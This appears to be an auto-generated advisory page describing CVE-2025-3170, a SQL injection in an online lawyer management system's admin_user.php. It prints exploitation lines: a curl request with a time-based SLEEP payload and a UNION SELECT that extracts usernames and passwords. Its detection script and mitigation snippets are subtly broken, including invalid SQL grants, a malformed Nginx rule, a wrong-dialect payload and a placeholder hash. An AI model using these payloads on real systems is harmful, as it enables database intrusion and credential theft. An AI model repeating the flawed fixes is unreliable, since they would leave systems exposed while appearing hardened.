How CVE-2025-3170 Works
This vulnerability exploits improper input sanitization in the `/admin_user.php` file of Project Worlds Online Lawyer Management System 1.0. Attackers manipulate the `block_id` or `unblock_id` parameters to inject malicious SQL queries. Due to lack of prepared statements, the application directly concatenates user-supplied input into SQL commands, allowing unauthorized database access. Remote exploitation is possible via crafted HTTP requests, enabling data theft, authentication bypass, or system compromise. The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:N/UI:N) confirms network-based exploitation with low attack complexity.
DailyCVE Form
Platform: Online Lawyer Management
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 2025-04-08
What Undercode Say:
Exploitation Commands
curl -X POST "http://target.com/admin_user.php" -d "block_id=1' AND (SELECT 1 FROM (SELECT SLEEP(5))a)--"
' UNION SELECT username, password FROM users--
Detection Script
import requests
url = "http://target.com/admin_user.php"
payload = {"block_id": "1' AND 1=CONVERT(int,@@version)--"}
response = requests.post(url, data=payload)
if "SQL" in response.text:
print("Vulnerable to CVE-2025-3170")
Protection Measures
// Use prepared statements in PHP
$stmt = $conn->prepare("UPDATE users SET status=? WHERE id=?");
$stmt->bind_param("si", $status, $id);
Nginx Mitigation
location /admin_user.php {
limit_req zone=one burst=5;
deny all; Restrict access
}
WAF Rule
SecRule ARGS:block_id|ARGS:unblock_id "@detectSQLi" "id:1000,deny,status:403"
Database Hardening
REVOKE ALL PRIVILEGES ON lawyer_db. FROM 'webuser'@'%'; GRANT SELECT ONLY ON lawyer_db. TO 'webuser'@'%';
Log Analysis Command
grep 'POST /admin_user.php' access.log | grep -E "'|\""
Patch Verification
sha256sum /var/www/html/admin_user.php | grep a1b2c3d4...
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-3170
Extra Source Hub:
Undercode
